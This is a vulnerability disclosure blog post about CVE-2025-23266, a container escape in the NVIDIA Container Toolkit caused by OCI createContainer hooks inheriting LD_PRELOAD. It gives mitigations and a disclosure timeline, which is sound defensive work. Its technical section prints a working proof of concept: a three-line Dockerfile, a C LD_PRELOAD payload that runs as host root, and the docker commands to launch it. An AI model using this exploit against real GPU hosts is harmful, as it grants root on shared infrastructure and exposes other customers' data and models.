Wiz Research has discovered a critical container escape vulnerability in the NVIDIA Container Toolkit (NCT), dubbed #NVIDIAScape. This toolkit underpins many of the AI services offered by cloud and SaaS providers, and the vulnerability, tracked as CVE-2025-23266, has been assigned a CVSS score of 9.0 (critical). A malicious container can bypass the toolkit's isolation measures and gain full root access to the host machine. The flaw stems from a subtle misconfiguration in how the toolkit handles OCI hooks, and it can be exploited with a surprisingly simple three-line Dockerfile.
Because the NVIDIA Container Toolkit is the backbone of many managed AI and GPU services across all major cloud providers, this vulnerability represents a systemic risk to the AI ecosystem, potentially breaking down the walls that separate different customers and affecting thousands of organizations.
The risk of this vulnerability is most severe for managed AI cloud services that allow customers to run their own AI containers on shared GPU infrastructure. In this scenario, a malicious customer could use this vulnerability to run a specially crafted container, escape its intended boundaries, and gain full root control of the host machine. From there, the attacker could access, steal, or manipulate the sensitive data and proprietary models of every other customer running on the same shared hardware.
This is exactly the class of vulnerability that has proven to be a systemic risk across AI clouds. Just a few months ago, Wiz Research demonstrated how similar container escape flaws allowed access to sensitive customer data in major services such as Replicate and DigitalOcean. The recurrence of these fundamental issues underscores the urgent need to scrutinize the security of core AI infrastructure as the world races to adopt it.
Affected components:
NVIDIA Container Toolkit: all versions up to and including v1.17.7 (CDI mode only for versions 1.17.5 and earlier)
NVIDIA GPU Operator: all versions up to and including 25.3.1
The main recommendation is to upgrade to the latest version of the NVIDIA Container Toolkit, as advised in the NVIDIA Security Bulletin.
Wiz customers can use a pre-built query in the Wiz Threat Intel Center to find vulnerable instances of the NVIDIA Container Toolkit in their environment.
Prioritization and context
Patching is highly recommended for all container hosts running a vulnerable version of the toolkit. Because the exploit is delivered inside the container image itself, prioritize hosts that may run containers built from untrusted or public images. Runtime validation can narrow prioritization further, focusing patching efforts on instances where the vulnerable toolkit is actively in use.
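For hands-on verification on a given host, the toolkit ships a CLI whose version output can confirm whether that host is patched. A sketch (run on the container host itself; confirm the packaged binary name for your distribution):

```
# Print the installed NVIDIA Container Toolkit CLI version;
# 1.17.8 and later include the fix for CVE-2025-23266.
nvidia-ctk --version
```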
It is important to note that Internet exposure is not a relevant factor when triaging this vulnerability; the affected hosts do not need to be publicly exposed. Instead, the initial access vector may involve social engineering against a developer, supply chain scenarios where attackers have gained prior access to a container image repository, or environments that allow users to load arbitrary images.
For systems that cannot be upgraded immediately, NVIDIA offers several mitigation options. The primary one is to opt out of the enable-cuda-compat hook, which is the source of the exposure.
For the NVIDIA Container Runtime
If you are using the NVIDIA Container Runtime in legacy mode, you can disable the hook by editing the /etc/nvidia-container-toolkit/config.toml file and setting the features.disable-cuda-compat-lib-hook flag to true:
disable-cuda-compat-lib-hook = true
For the NVIDIA GPU Operator
If you are using the NVIDIA GPU Operator, you can disable the hook by adding disable-cuda-compat-lib-hook to the NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES environment variable. This can be done by including the following arguments when installing or upgrading the GPU Operator with Helm:
--set "toolkit.env[0].name=NVIDIA_CONTAINER_TOOLKIT_OPT_IN_FEATURES" \
--set "toolkit.env[0].value=disable-cuda-compat-lib-hook"
Note: other feature flags must be added as a comma-separated list in the value field.
For users on a GPU Operator version prior to 25.3.1, you can deploy the patched NVIDIA Container Toolkit version 1.17.8 by including the following arguments in the Helm command:
Note: for Red Hat Enterprise Linux or Red Hat OpenShift, you must specify the v1.17.8-ubi8 tag.
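As a sketch only: toolkit.version is a standard GPU Operator chart value, but the release name, namespace, and exact image tag below are illustrative assumptions that should be checked against NVIDIA's documentation for your distribution.

```
# Hypothetical Helm invocation pinning the patched toolkit version.
# On RHEL/OpenShift, use the v1.17.8-ubi8 tag instead (see note above).
helm upgrade gpu-operator nvidia/gpu-operator \
  -n gpu-operator \
  --set toolkit.version=v1.17.8
```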
Why Research the NVIDIA Container Toolkit?
The entire AI revolution is built on the power of NVIDIA GPUs. In the cloud, the key component that securely connects containerized applications to these GPUs is the NVIDIA Container Toolkit.
This is not the first time this core component has been found to contain a serious vulnerability. Last year, Wiz Research disclosed CVE-2024-0132, a similar container escape flaw that allowed a complete takeover of the host. These findings are part of our ongoing research into AI supply chain security: we are investigating every layer of the AI stack, from the infrastructure (Hugging Face, Replicate, SAP AI Core) to the models themselves and the software used to run them (Ollama).
Technical Analysis
The path to this container escape is not a complex memory corruption bug, but rather a subtle interaction between container specifications, trusted host components, and a classic Linux trick. Understanding the exploit requires examining three pieces: the OCI hook mechanism, the specific flaw in NVIDIA's implementation, and the weaponization of that flaw.
The Open Container Initiative (OCI) specification defines the standard for container runtimes. Part of this standard is the "hook" system, which allows tools to run executables at specific points in the container lifecycle. The NVIDIA Container Toolkit (NCT) uses these hooks to perform its key function: configuring the container to communicate with the host's NVIDIA driver and GPUs.
When a container is started with the NVIDIA runtime, NCT registers several hooks, including the following createContainer hook:
{
    "path": "/usr/bin/nvidia-ctk",
    "args": ["nvidia-ctk", "hook", "enable-cuda-compat", …]
},
…
This hook runs as a privileged process on the host and sets up the environment the container requires.
The OCI specification defines several types of hooks. While prestart hooks run in a clean, isolated context, createContainer hooks have an important property: they inherit environment variables from the container image unless explicitly configured otherwise.
According to the OCI specification on GitHub:
"… On Linux, this would happen before the pivot_root operation is executed but after the mount namespace was created and set up."
The ability to control the environment of a privileged hook gives an attacker many options. One of the most direct is to abuse LD_PRELOAD, a well-known and powerful Linux environment variable that forces a process to load a specified shared library (.so file).
By setting LD_PRELOAD in the Dockerfile, an attacker can instruct the nvidia-ctk hook to load a malicious library. Worse, the createContainer hook runs with its working directory set to the container's root filesystem. This means the malicious library can be loaded directly from the container image with a simple path, completing the exploit chain.
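To make the LD_PRELOAD step concrete, here is a minimal, hypothetical sketch of what a payload like poc.so could look like. The actual poc.so is not published in this post; the output path and recorded value below are illustrative assumptions.

```c
/* poc.c -- hypothetical sketch of an LD_PRELOAD payload such as poc.so.
 * Build as a shared library:  gcc -shared -fPIC -o poc.so poc.c
 * The dynamic loader runs this constructor in every process that maps
 * the library -- including the privileged nvidia-ctk hook on the host. */
#include <stdio.h>
#include <unistd.h>

__attribute__((constructor))
static void escape(void) {
    /* Inside the hook, this code runs as root on the host. Here it just
     * records the uid it is running as (a stand-in for the real payload). */
    FILE *f = fopen("/tmp/owned", "w");
    if (f != NULL) {
        fprintf(f, "uid=%d\n", (int)getuid());
        fclose(f);
    }
}
```

Because the code lives in an ELF constructor, it fires as soon as the loader maps the library, before the hijacked process's own main() runs; no function in the host binary ever needs to be called.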
The Exploit: A Three-Line Dockerfile
One of the most surprising aspects of this vulnerability is its simplicity. An attacker simply builds a container image containing a malicious payload and a Dockerfile of just three lines.
The malicious Dockerfile:
FROM busybox
ENV LD_PRELOAD=/proc/self/cwd/poc.so
ADD poc.so /
When this container runs on a vulnerable system, the nvidia-ctk createContainer hook inherits the LD_PRELOAD variable. Because the hook's working directory is the container's filesystem, it loads the attacker's poc.so file into its own privileged process, achieving an instant container escape.
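The /proc/self/cwd trick is what makes the payload path work: it is a per-process symlink that each process resolves against its own working directory. A quick illustration on any Linux machine, using /tmp as a stand-in for the hook's working directory (which in the real attack is the container's rootfs):

```shell
# /proc/self/cwd always points at the *calling* process's current working
# directory. When the privileged hook resolves LD_PRELOAD, its cwd is the
# container rootfs, so the path lands on the attacker's poc.so.
cd /tmp
readlink /proc/self/cwd
```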
To prove this, the poc.so payload simply executes the id command and writes its output to a file on the host.
Running the exploit:
$ docker build . -t nct-exploit
# Run it on a host with a vulnerable NVIDIA Container Toolkit
$ docker run --rm --runtime=nvidia --gpus=all nct-exploit
Result: root on the host.
Responsible Disclosure Timeline
May 17, 2025: Initial vulnerability report sent to NVIDIA at Pwn2Own Berlin.
July 15, 2025: NVIDIA released a security bulletin and assigned CVE-2025-23266.
July 17, 2025: Wiz Research published this blog post.
When it comes to AI security, this vulnerability once again highlights that the most realistic and immediate risks to AI applications today come from the underlying infrastructure and tooling. While hype about AI security tends to focus on AI-based attacks, vulnerabilities in the "old-school" infrastructure of the ever-growing AI technology stack remain the immediate threat that security teams should prioritize.
This practical attack surface is the result of the rapid adoption of new AI tools and services. It is therefore important for security teams to work closely with AI engineers to gain visibility into the architecture, tooling, and AI models in use. Specifically, as this vulnerability shows, it is important to build a mature pipeline that runs AI models with full control over their source and integrity.
Furthermore, this research highlights, and not for the first time, that containers are not a strong security barrier and should not be relied upon as the sole means of isolation. When designing applications, especially in multi-tenant environments, always "assume a vulnerability" and ensure at least one strong isolation barrier, such as virtualization (as described in the PEACH framework). Wiz Research has written extensively about this issue; you can read more in our previous research on Alibaba Cloud, IBM, Azure, Hugging Face, Replicate, and SAP.
Stay in touch!
Hi! We are Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_), Ronen Shustin (@ronenshh), Hillai Ben-Sasson (@hillai), Andres Riancho (@andresriancho), and Yuval Avrahami (@yuvalavra). We are a group of veteran white-hat hackers with a single goal: to make the cloud a safe place for everyone. We focus primarily on finding new attack vectors in the cloud and researching isolation issues affecting cloud vendors and service providers. We would love to hear from you! Feel free to reach out via X (Twitter) or email: research@wiz.io.